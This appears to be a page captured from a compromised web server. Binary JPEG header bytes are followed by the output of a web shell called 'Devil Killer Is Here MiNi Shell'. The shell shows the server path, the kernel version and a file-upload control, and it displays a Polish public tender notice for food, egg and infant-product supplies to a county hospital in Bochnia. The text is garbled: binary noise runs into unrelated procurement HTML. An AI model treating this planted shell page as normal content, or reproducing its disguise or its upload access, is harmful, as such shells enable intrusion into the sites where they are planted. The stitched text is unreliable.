JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230606/0025006701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów żywnościowych <br/>dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni &#34;Szpital Powiatowy&#34; im. bł. Marty Wieckiej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000304349</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krakowska 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bochnia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zaopatrzenie@szpital-bochnia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://szpital-bochnia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów żywnościowych <br/>dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3222bcab-0461-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00250067</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00065357/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Dostawa artkułów żywnościowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3222bcab-0461-11ee-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">eZamówienia https://ezamowienia.gov.pl/pl/ oraz poczty elektronicznej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://ezamowienia.gov.pl/pl/komponent-edukacyjny/.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wszystkie informacje dotyczące RODO zawarte zostały w załączniku do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wszystkie informacje dotyczące RODO zawarte zostały w załączniku do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZ-271-1-20/TP/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem Zamówienia jest artykułów żywnościowych (dalej jako Towar) dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej<br/>Pakiet nr 1 - Artykuły spożywcze<br/>Lp.	Przedmiot zamówienia	J.m	Wielkość opakowania oczekiwana przez Zamawiającego Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)<br/>1.	2.	3.	4. 5.<br/>1.	Bazylia	op.	10g	10	120,0<br/>2.	Biszkopty	op.	120g	120	400,0<br/>3.	Groszek ptysiowy	op.	125 g	125	50,0<br/>4.	Przyprawa do dań z fasoli	op.	20 g	20	50,0<br/>5.	Przyprawa do ryb	op.	20 g	20	100,0<br/>6.	Bita śmietana	op.	60 g	60	20,0<br/>7.	Mąka razowa op.	1000 g	1000	10,0<br/>8.	Papryka czerwona mielona ostra	op.	20 g	20	50,0<br/>9.	Gałka muszkatołowa	op.	10 g	10	50,0<br/>10.	Tymianek	op.	10 g	10	50,0<br/>11.	Kasza pęczak	op.	1000 g	1000	50,0<br/>12.	Imbir	op.	15 g	15	20,0<br/>13.	Słonecznik łuskany	op.	1000 g	1000	15,0<br/>14.	Sezam	op.	1000 g	1000	6,0<br/>15.	Żelatyna	op.	500 g	500	60,0<br/>16.	Cukier wanilinowy	op.	1000 g	1000	10,0<br/>17.	Soda oczyszczona	op.	1000 g	1000	6,0<br/>18.	Ksylitol	op.	1000 g	1000	12,0<br/>19.	Curry	op.	20 g	20	100,0<br/>20.	Fasola czerwona w puszce	op.	400 g	400	60,0<br/>21.	Rodzynki	op.	1000 g	1000	24,0<br/>22.	Kurkuma	op.	20 g	20	200,0<br/>23.	Czosnek granulowany	op.	1000 g	1000	20,0<br/>24.	Budyń bez cukru op.	1kg	1	50,0<br/>25.	Wafle ryżowe naturalne op.	130 g	130	180,0<br/>26.	Budyń z cukrem op.	60g	60	10,0<br/>27.	Chrupki kukurydziane bez dodatków	op.	80g	80	600,0<br/>28.	Ciastko biszkoptowe, op.	30 g	30	450,0<br/>29.	Chrzan tarty	op.	290g	290	140<br/>30.	Cukier op.	1kg	1000	1700,0<br/>31.	Cukier puder	op.	400g	400	12,0<br/>32.	Cynamon op.	20g	350	300,0<br/>33.	Drożdże	op.	100g	100	80,0<br/>34.	Drożdże	op.	14 g	14	150,0<br/>35.	Dżem op.	25g	25	20000,0<br/>36.	Galaretka owocowa op.	71g	71	200,0<br/>37.	Groszek konserwowy	op.	400g	400	250,0<br/>38.	Tortilla - placki pszenne op.	250 g	250	220,0<br/>39.	Herbata op.	200g	200	400,0<br/>40.	Herbatniki op.	50g	50	700,0<br/>41.	Kakao op.	80g	80	70,0<br/>42.	Kasza jęczmienna mazurska	op.	1kg	1000	950,0<br/>43.	Kasza kukurydziana op.	1kg	1000	800,0<br/>44.	Kasza manna op.	1kg	1000	900,0<br/>45.	Kawa zbożowa op.	500g	500	45,0<br/>46.	Ketchup łagodny	op.	560g	560	550<br/>47.	Kisiel bez cukru op.	1kg	1000	90,0<br/>48.	Kisiel z cukrem op.	77g	77	20,0<br/>49.	Kminek op.	15g	15	100<br/>50.	Koncentrat pomidorowy	op.	1l	1000	700,0<br/>51.	Kukurydza konserwowa	op.	400g	400	380,0<br/>52.	Kwasek cytrynowy op.	20g	20	350,0<br/>53.	Liście laurowe	op.	100g	100	10,0<br/>54.	Majeranek op.	20g	20	180,0<br/>55.	Majonez op.	835g	835	450,00<br/>56.	Makaron op.	1kg	1000	1400,0<br/>57.	Makaron lasagne	op.	500g	500	50,0<br/>58.	Makaron zacierka	op.	250 g	250	650,0<br/>59.	Makaron sphagetti	op.	500g	500	50,0<br/>60.	Makaron muszelki, kokardki	op.	400g	400	650,0<br/>61.	Makaron penne	op.	500 g	500	50,0<br/>62.	Makaron cannelloni	op.	250 g	250	50,0<br/>63.	Makaron conchiglioni (muszle duże)	op.	500 g	500	30,0<br/>64.	Mąka pszenna typ. 500	op.	1kg	1000	1900,0<br/>65.	Mąka ziemniaczana	op.	1kg	1000	50,0<br/>66.	Miód naturalny op.	25g	25	3800,0<br/>67.	Musztarda op.	1l	1000	50,0<br/>68.	Ocet op.	1l	1000	100,0<br/>69.	Ogórek konserwowy op.	900ml	900	490,0<br/>70.	Olej roślinny op.	1l	1000	1400,0<br/>71.	Oregano	op.	10g	10	120,0<br/>72.	Papryka mielona słodka	op.	20g	20	320,0<br/>73.	Pieprz czarny mielony	op.	20g	20	550,0<br/>74.	Płatki owsiane op.	500g	500	1200,0<br/>75.	Proszek do pieczenia	op.	30g	30	80,0<br/>76.	Przyprawa sypka	op.	1kg	1000	450,0<br/>77.	Przyprawa w płynie	op.	1l	1000	500,0<br/>78.	Ryż op.	1kg	1000	1000,0<br/>79.	Sól op.	1kg	1000	500,0<br/>80.	Sucharki op.	290g	290	1000,0<br/>81.	Ziele angielskie op.	15g	15	130,0<br/>82.	Zioła prowansalskie	op.	10g	10	130,0<br/>83.	Bita śmietana spray	op.	250 g	250	20,0<br/>84.	Musli chrupkie bananowe z kawałkami czekolady i nasionami chia	op.	300 g	300	190,0<br/>85.	Soczewica czerwona op.	3 kg	3000	50,0<br/>86.	lubczyk op.	250 g	250	10,0<br/>87.	pieprz ziołowy	op.	360 g	360	10,0<br/>88.	rozmaryn 250g pet	op.	250 g	250	5,0<br/>89.	siemię lniane 400 g	op.	400 g	400	40,0<br/>90.	groszek zielony mrożony	op.	450 g	450	100,0<br/>91.	dżem niskosłodzony	op.	3,5 kg	3500	80,0<br/>92.	kasz gryczana	op.	1 kg	1000	80,0<br/>93.	makaron gwiazdki	op.	250 g	250	100,0<br/>94.	makaron ryż	op.	250 g	250	100,0<br/>95.	przyprawa do kurczaka op.	5 kg	5000	15,0<br/>96.	makaron pełnoziarnisty	op.	400 g	400	50,0<br/>97.	mleko w proszku	op. 400 g	400	20,0<br/>98.	andrut	op.	160 g	160	40,0<br/>99.	Żurek w torebkach op.	60g	60	260,0<br/>Szczegółowy zakres parametrów i wymagań dla przedmiotu Zamówienia opisany został w formularzu asortymentowym<br/>- Szczegółowa Oferta Cenowa- załącznik 1A do SWZ - wymagania określone na podstawie art. 218 ust. 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ZAMÓWIENIE Z PRAWEM OPCJI zgodnie z art. 441 Ustawy Pzp – Możliwość skorzystania z prawa opcji przez<br/>Zamawiającego opisana została w załączniku nr 3 do SWZ - projektowane postanowienia umowy w sprawie zamówienia<br/>publicznego <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny, z uwagi na fakt, iż Zamawiający w opisie przedmiotu zamówienia określił wymagania jakościowe odnoszące się do co najmniej głównych elementów<br/>składających się na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem Zamówienia jest artykułów żywnościowych (dalej jako Towar) dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej<br/><br/>Pakiet nr 2 - Jaja<br/><br/><br/>Szczegółowy zakres parametrów i wymagań dla przedmiotu Zamówienia opisany został w formularzu asortymentowym - Szczegółowa Oferta Cenowa- załącznik 1A do SWZ - wymagania określone na podstawie art. 218 ust. 2<br/><br/>Lp.	Przedmiot zamówienia	J. m.	Ilość	Szczegółowy opis przedmiotu zamówienia - wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia zgodnie z art. 246 ust. 1 Ustawy Pzp<br/>1.	2.	3.	4.	5.<br/>1.	Jaja kurze szt.	24000	Jaja kurze M – średnie: od 53 g do 63 g, czyste, z nieuszkodzoną skorupką* </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ZAMÓWIENIE Z PRAWEM OPCJI zgodnie z art. 441 Ustawy Pzp – Możliwość skorzystania z prawa opcji przez<br/>Zamawiającego opisana została w załączniku nr 3 do SWZ - projektowane postanowienia umowy w sprawie zamówienia<br/>publicznego <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny, z uwagi na fakt, iż Zamawiający w opisie przedmiotu zamówienia określił wymagania jakościowe odnoszące się do co najmniej głównych elementów<br/>składających się na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem Zamówienia jest artykułów żywnościowych (dalej jako Towar) dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej<br/><br/>Szczegółowy zakres parametrów i wymagań dla przedmiotu Zamówienia opisany został w formularzu asortymentowym - Szczegółowa Oferta Cenowa- załącznik 1A do SWZ - wymagania określone na podstawie art. 218 ust. 2 <br/><br/>Pakiet nr 3 - Kleiki, kaszki i zupki<br/><br/>Lp.	Przedmiot zamówienia	J. m.	Ilość	Szczegółowy opis przedmiotu zamówienia - wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia zgodnie z art. 246 ust. 1 Ustawy Pzp<br/>1.	2.	3.	4.	5.<br/>1.	Kleik ryżowy	szt.	15	Kleik ryżowy a&#39;180g+/-50g, nie zawierący białka mleka krowiego, produkt bezglutenowy, zawierący łatwo przyswajalną skrobię, wzbogacony w witaminę B1<br/>2.	Deserek owocowy dla dzieci po 4 miesiącu	szt.	250	Deserek owocowy dla dzieci po 4 miesiącu; jabłko; skład: Owoce 99,97% (jabłka 99,97%), witamina C; opakowanie 125 g<br/>3.	Deserek owocowy dla dzieci po 5 miesiącu	szt.	250	Deserek owocowy dla dzieci po 5 miesiącu; jabłka i morele; skład: owoce 97% (jabłka 73%, morele 24%), mąka ryżowa, witamina C; 125 g<br/>4.	Deserek owocowy dla dzieci po 6 miesiącu	szt.	250	Deserek owocowy dla dzieci po 6 miesiącu; morele, banany, jabłka; skład: owoce 98% (morele 37%, jabłka 37%, banany 24%), mąka ryżowa, witamina C, opakowanie 190 g<br/>5.	Deserek owocowy dla dzieci po 8 miesiącu	szt.	250	Deserek owocowy dla dzieci po 8 miesiącu; brzoskwinia, jabłko, mango; skład: brzoskwinie (35%), jabłka (30%), kawałki jabłek (23%), mango (9%), mąka ryżowa, witamina C (kwas L-askorbinowy), opakowanie 190 g<br/>6.	Modyfikowane mleko początkowe dla niemowląt od urodzenia	szt.	15	Modyfikowane mleko początkowe dla niemowląt od urodzenia op. 350 g<br/>7.	Mleko następne dla niemowląt po 6. miesiącu	szt.	15	Mleko następne dla niemowląt po 6. miesiącu op. 350 g<br/>8.	Kaszka ryżowa	szt.	30	Kaszka ryżowa 180 g; smak bananowy; składniki: Mąka ryżowa 87,2 %, cukier, płatki bananowe 3,6 %, proszek bananowy 1 % (maltodekstryna, suszony banan, naturalny aromat bananowy), witaminy i składniki mineralne (C, E, niacyna, A, D, kwas pantotenowy, B6, tiamina, biotyna, kwas foliowy, wapń, żelazo, cynk), maltodekstryna. <br/>9.	Kaszka mleczno-ryżowa	szt.	30	&#34;Kaszka mleczno-ryżowa a&#39;230g+/-50g. Smak bananowy - składniki:<br/>Mleko modyfikowane 48 % (odmineralizowana serwatka w proszku ( z mleka), odtłuszczone mleko w proszku, oleje roślinne (palmowy, rzepakowy, kokosowy, słonecznikowy), lecytyna sojowa), mąka ryżowa 40 %, cukier, owoce 3,8 % (płatki bananowe 3,8 %), witaminy i składniki mineralne (C, E, tiamina (B1), B6, A, biotyna (B7), D, wapń, żelazo, jod), maltodekstryna, naturalny aromat bananowy&#34;<br/>10.	Zupka marchewkowa z ryżem	szt.	100	Zupka marchewkowa z ryżem, o gładkiej konsystencji, produkt bezglutenowy, bez konserwantów, sztucznych barwników i dodatków smakowych, pasteryzowany w słoiczkach a&#39;125g+/-50g<br/>11.	Zupka jarzynowa z kurczakiem	szt.	300	Zupka jarzynowa z kurczakiem o gładkiej konsystencji, produkt bezglutenowy, bez konserwantów, sztucznych barwników i dodatków smakowych, pasteryzowany w słoiczkach a&#39;125g+/-50g </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ZAMÓWIENIE Z PRAWEM OPCJI zgodnie z art. 441 Ustawy Pzp – Możliwość skorzystania z prawa opcji przez<br/>Zamawiającego opisana została w załączniku nr 3 do SWZ - projektowane postanowienia umowy w sprawie zamówienia<br/>publicznego <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny, z uwagi na fakt, iż Zamawiający w opisie przedmiotu zamówienia określił wymagania jakościowe odnoszące się do co najmniej głównych elementów<br/>składających się na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 